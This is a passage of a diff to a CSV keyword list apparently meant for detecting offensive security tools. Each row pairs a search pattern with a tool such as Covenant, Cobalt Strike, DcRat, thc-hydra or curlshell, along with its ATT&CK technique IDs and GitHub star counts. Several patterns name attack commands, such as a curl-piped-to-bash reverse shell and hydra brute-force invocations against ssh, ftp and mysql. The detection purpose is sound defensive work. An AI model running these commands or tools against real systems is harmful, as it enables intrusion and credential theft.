environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*https://127.0.0.1:7443*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*https://127.0.0.1:7443*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*https://127.0.0.1:7443*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*https://127.0.0.1:7443*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*https://amsi.fail/*","offensive_tool_keyword","amsi.fail","AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.","T1059.001 - T1562.001 - T1027.005","TA0002 - TA0005 - TA0008","N/A","N/A","Defense Evasion","https://amsi.fail/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*https://avred.r00ted.ch/upload*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*https://crackstation.net/*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" -"*https://curlshell:* | bash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*https://avred.r00ted.ch/upload*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*https://crackstation.net/*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*https://curlshell:* | bash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" "*https://cyseclabs.com/exploits/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*https://dnsdumpster.com/*","offensive_tool_keyword","dnsdumpster","dns recon & research - find & lookup dns records","T1018 - T1596.001 - T1590.002","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://dnsdumpster.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" -"*https://ffuf.io.fi*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*https://ffuf.io/FUZZ*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" 
-"*https://github.com/bitsadmin/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*https://ffuf.io.fi*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*https://ffuf.io/FUZZ*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*https://github.com/bitsadmin/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*https://gitlab.com/kalilinux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*https://kali.download/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*https://localhost:7443/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*https://pastebin.com/raw/fevFJe98*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*https://localhost:7443/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - 
T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*https://pastebin.com/raw/fevFJe98*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*https://t.me/BotFather*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" "*https://t.me/machine1337*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - 
T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" "*https://web.archive.org/*https://www.kernel-exploits.com/media/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*https://wfuzz.readthedocs.io*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*https://www.myget.org/F/fireeye/api/v2*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*https://wfuzz.readthedocs.io*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*https://www.myget.org/F/fireeye/api/v2*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" 
"*https_revshell.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*httpsmuggler.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" -"*https-portal*","offensive_tool_keyword","https-portal","HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.","T1042 - T1571 - T1021 - T1135","TA0002 - TA0003 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/SteveLTN/https-portal","1","0","N/A","N/A","10","4209","288","2023-01-29T14:55:41Z","2015-12-14T20:09:04Z" -"*'http-stager'*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*https-portal*","offensive_tool_keyword","https-portal","HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.","T1042 - T1571 - T1021 - T1135","TA0002 - TA0003 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/SteveLTN/https-portal","1","0","N/A","N/A","10","4210","288","2023-01-29T14:55:41Z","2015-12-14T20:09:04Z" +"*'http-stager'*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*huan.exe *.exe","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*Huan.sln*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. 
It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*Huan.vcxproj*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*HuanLoader.vcxproj*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*hub.docker.com/u/kalilinux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*HunnicCyber/SharpDomainSpray*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" -"*HVNC Server.exe*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HVNC\ Server*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * ftp://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * http-post-form *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * mysql://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * ssh://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*hydra * telnet://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to 
attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
-"*hydra smtp-enum*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
-"*hydra.c*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
-"*hydra:x:10001:*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
-"*HYDRA_PROXY_HTTP*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
-"*hydra-cobaltstrike*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*HVNC Server.exe*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*HVNC\ Server*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*hydra * ftp://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*hydra * http-post-form *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*hydra * mysql://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*hydra * ssh://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*hydra * telnet://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*hydra smtp-enum*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*hydra.c*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*hydra:x:10001:*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
